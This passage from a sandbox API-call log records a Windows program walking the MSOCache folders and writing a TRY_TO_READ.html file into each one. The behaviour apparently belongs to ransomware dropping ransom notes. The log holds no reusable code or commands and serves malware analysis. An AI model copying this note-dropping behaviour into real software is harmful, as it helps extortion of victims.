lpOverlapped=0x0) returned 1 [0065.522] CloseHandle (hObject=0x45c) returned 1 [0065.522] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0065.522] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466798 | out: hHeap=0x410000) returned 1 [0065.522] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466788 | out: hHeap=0x410000) returned 1 [0065.523] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458418 | out: hHeap=0x410000) returned 1 [0065.523] FindNextFileW (in: hFindFile=0x48e770, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf00dbad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf00dbad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-001A-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9765F~1")) returned 1 [0065.523] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0065.523] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.523] GetLastError () returned 0x0 [0065.523] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x457f50 [0065.523] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.523] GetLastError () returned 0x0 [0065.523] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4b1740 [0065.523] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4b17a8 [0065.523] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1740 | out: hHeap=0x410000) returned 1 [0065.523] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b17a8 | out: hHeap=0x410000) returned 1 [0065.523] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458418 [0065.523] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x472028 [0065.523] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4584a0 [0065.523] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466788 [0065.523] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466798 [0065.523] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.523] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458528 [0065.523] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.523] GetLastError () returned 0x0 [0065.523] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc0) returned 0x43e3f8 [0065.523] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458528 | out: hHeap=0x410000) returned 1 [0065.523] GetLastError () returned 0x0 [0065.523] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xb0) returned 0x473108 [0065.523] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0065.527] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473108 | out: hHeap=0x410000) returned 1 [0065.527] WriteFile (in: hFile=0x45c, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.528] WriteFile (in: hFile=0x45c, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.528] WriteFile (in: hFile=0x45c, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0065.528] CloseHandle (hObject=0x45c) returned 1 [0065.528] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0065.528] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466798 | out: hHeap=0x410000) returned 1 [0065.528] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466788 | out: hHeap=0x410000) returned 1 [0065.528] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4584a0 | out: hHeap=0x410000) returned 1 [0065.528] FindNextFileW (in: hFindFile=0x48e770, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-001B-0409-1000-0000000FF1CE}-C", cAlternateFileName="{94E50~1")) returned 1 [0065.528] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0065.528] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.528] GetLastError () returned 0x0 [0065.528] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x457f50 [0065.528] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.528] GetLastError () returned 0x0 [0065.528] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4b17a8 [0065.528] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4b1740 [0065.528] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b17a8 | out: hHeap=0x410000) returned 1 [0065.529] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1740 | out: hHeap=0x410000) returned 1 [0065.529] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4584a0 [0065.529] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x472050 [0065.529] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458528 [0065.529] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466788 [0065.529] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466798 [0065.529] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.529] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4585b0 [0065.529] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.529] GetLastError () returned 0x0 [0065.529] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc0) returned 0x43e3f8 [0065.529] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4585b0 | out: hHeap=0x410000) returned 1 [0065.529] GetLastError () returned 0x0 [0065.529] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xb0) returned 0x473108 [0065.529] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0065.532] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473108 | out: hHeap=0x410000) returned 1 [0065.532] WriteFile (in: hFile=0x45c, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.533] WriteFile (in: hFile=0x45c, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.533] WriteFile (in: hFile=0x45c, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0065.533] CloseHandle (hObject=0x45c) returned 1 [0065.533] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0065.533] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466798 | out: hHeap=0x410000) returned 1 [0065.533] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466788 | out: hHeap=0x410000) returned 1 [0065.533] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458528 | out: hHeap=0x410000) returned 1 [0065.533] FindNextFileW (in: hFindFile=0x48e770, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf58c8770, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf58c8770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-002C-0409-1000-0000000FF1CE}-C", cAlternateFileName="{92787~1")) returned 1 [0065.534] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0065.534] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.534] GetLastError () returned 0x0 [0065.534] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x457f50 [0065.534] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.534] GetLastError () returned 0x0 [0065.534] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4b1740 [0065.534] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4b17a8 [0065.534] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1740 | out: hHeap=0x410000) returned 1 [0065.534] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b17a8 | out: hHeap=0x410000) returned 1 [0065.534] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458528 [0065.534] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47f540 [0065.534] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4585b0 [0065.534] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466788 [0065.534] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466798 [0065.534] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.534] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458638 [0065.534] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.534] GetLastError () returned 0x0 [0065.534] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc0) returned 0x43e3f8 [0065.534] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458638 | out: hHeap=0x410000) returned 1 [0065.534] GetLastError () returned 0x0 [0065.534] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xb0) returned 0x473108 [0065.534] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0065.537] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473108 | out: hHeap=0x410000) returned 1 [0065.537] WriteFile (in: hFile=0x45c, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.537] WriteFile (in: hFile=0x45c, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.538] WriteFile (in: hFile=0x45c, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0065.538] CloseHandle (hObject=0x45c) returned 1 [0065.538] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0065.538] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466798 | out: hHeap=0x410000) returned 1 [0065.538] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466788 | out: hHeap=0x410000) returned 1 [0065.538] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4585b0 | out: hHeap=0x410000) returned 1 [0065.538] FindNextFileW (in: hFindFile=0x48e770, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc3e6570, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc3e6570, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-0043-0409-1000-0000000FF1CE}-C", cAlternateFileName="{95310~1")) returned 1 [0065.538] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0065.538] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.538] GetLastError () returned 0x0 [0065.538] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x457f50 [0065.538] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.538] GetLastError () returned 0x0 [0065.538] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4b17a8 [0065.538] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4b1740 [0065.538] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b17a8 | out: hHeap=0x410000) returned 1 [0065.538] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1740 | out: hHeap=0x410000) returned 1 [0065.538] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4585b0 [0065.538] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47f4f0 [0065.538] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458638 [0065.538] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466788 [0065.539] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466798 [0065.539] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.539] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4586c0 [0065.539] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.539] GetLastError () returned 0x0 [0065.539] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc0) returned 0x43e3f8 [0065.539] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4586c0 | out: hHeap=0x410000) returned 1 [0065.539] GetLastError () returned 0x0 [0065.539] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xb0) returned 0x473108 [0065.539] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0065.541] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473108 | out: hHeap=0x410000) returned 1 [0065.541] WriteFile (in: hFile=0x45c, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.542] WriteFile (in: hFile=0x45c, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.542] WriteFile (in: hFile=0x45c, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0065.543] CloseHandle (hObject=0x45c) returned 1 [0065.543] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0065.543] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466798 | out: hHeap=0x410000) returned 1 [0065.543] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466788 | out: hHeap=0x410000) returned 1 [0065.543] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458638 | out: hHeap=0x410000) returned 1 [0065.543] FindNextFileW (in: hFindFile=0x48e770, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa13c510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-0044-0409-1000-0000000FF1CE}-C", cAlternateFileName="{91454~1")) returned 1 [0065.543] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0065.543] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.543] GetLastError () returned 0x0 [0065.543] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x457f50 [0065.543] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.543] GetLastError () returned 0x0 [0065.543] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4b1740 [0065.543] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4b17a8 [0065.543] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1740 | out: hHeap=0x410000) returned 1 [0065.543] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b17a8 | out: hHeap=0x410000) returned 1 [0065.543] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458638 [0065.543] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47f4a0 [0065.543] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4586c0 [0065.543] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466788 [0065.543] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466798 [0065.543] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.543] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458748 [0065.543] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.543] GetLastError () returned 0x0 [0065.543] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc0) returned 0x43e3f8 [0065.544] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458748 | out: hHeap=0x410000) returned 1 [0065.544] GetLastError () returned 0x0 [0065.544] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xb0) returned 0x473108 [0065.544] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0065.546] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473108 | out: hHeap=0x410000) returned 1 [0065.546] WriteFile (in: hFile=0x45c, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.547] WriteFile (in: hFile=0x45c, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.547] WriteFile (in: hFile=0x45c, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0065.547] CloseHandle (hObject=0x45c) returned 1 [0065.547] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0065.547] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466798 | out: hHeap=0x410000) returned 1 [0065.547] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466788 | out: hHeap=0x410000) returned 1 [0065.547] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4586c0 | out: hHeap=0x410000) returned 1 [0065.547] FindNextFileW (in: hFindFile=0x48e770, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x43bdc500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{90140000-0054-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9EA85~1")) returned 1 [0065.547] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0065.547] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.547] GetLastError () returned 0x0 [0065.548] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x457f50 [0065.548] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.548] GetLastError () returned 0x0 [0065.548] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4b17a8 [0065.548] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x4b1740 [0065.548] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b17a8 | out: hHeap=0x410000) returned 1 [0065.548] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1740 | out: hHeap=0x410000) returned 1 [0065.548] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4586c0 [0065.548] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47f608 [0065.548] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458748 [0065.548] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466788 [0065.548] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466798 [0065.548] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.548] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4587d0 [0065.548] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.548] GetLastError () returned 0x0 [0065.548] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc0) returned 0x43e3f8 [0065.548] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4587d0 | out: hHeap=0x410000) returned 1 [0065.548] GetLastError () returned 0x0 [0065.548] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xb0) returned 0x473108 [0065.548] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\TRY_TO_READ.html" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0065.550] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473108 | out: hHeap=0x410000) returned 1 [0065.550] WriteFile (in: hFile=0x45c, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.551] WriteFile (in: hFile=0x45c, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.551] WriteFile (in: hFile=0x45c, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 